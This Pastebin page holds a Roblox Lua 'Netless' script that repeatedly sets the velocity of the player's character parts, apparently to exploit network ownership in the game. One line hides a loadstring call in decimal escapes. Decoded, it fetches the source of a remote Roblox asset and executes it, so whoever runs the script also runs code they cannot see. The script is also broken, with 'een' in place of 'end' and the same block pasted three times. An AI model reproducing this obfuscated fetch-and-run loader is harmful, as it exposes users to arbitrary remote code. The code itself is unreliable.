Advertisement
C-H-4-0-S

Netless

Mar 31st, 2024
28
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.32 KB | None | 0 0
  1. -- when you reset make sure to re-execute this or just make this execute in a loop
  2. for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do
  3. if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then
  4. game:GetService("RunService").Heartbeat:connect(function()
  5. v.Velocity = Vector3.new(-30,0,0)
  6. end)
  7. end
  8. end
  9.  
  10.  
  11. for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do
  12. if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then
  13. game:GetService("RunService").Heartbeat:connect(function()
  14. v.Velocity = Vector3.new(-30,0,0)
  15. end)
  16. end
  17. een
  18.  
  19.  
  20. net = true -- if false = do nothing
  21. notify = false -- set this to false if u don't want to see notiflication
  22.  
  23.  
  24. loadstring("\13\10\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\71\101\116\79\98\106\101\99\116\115\40\34\114\98\120\97\115\115\101\116\105\100\58\47\47\55\50\53\55\55\54\49\55\56\53\34\41\91\49\93\46\83\111\117\114\99\101\41\40\41\13\10")()
  25.  
  26. -- when you reset make sure to re-execute this or just make this execute in a loop
  27. for i,v in next, game:GetService("Players").LocalPlayer.Character:GetDescendants() do
  28. if v:IsA("BasePart") and v.Name ~="HumanoidRootPart" then
  29. game:GetService("RunService").Heartbeat:connect(function()
  30. v.Velocity = Vector3.new(-30,0,0)
  31. end)
  32. end
  33. een
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement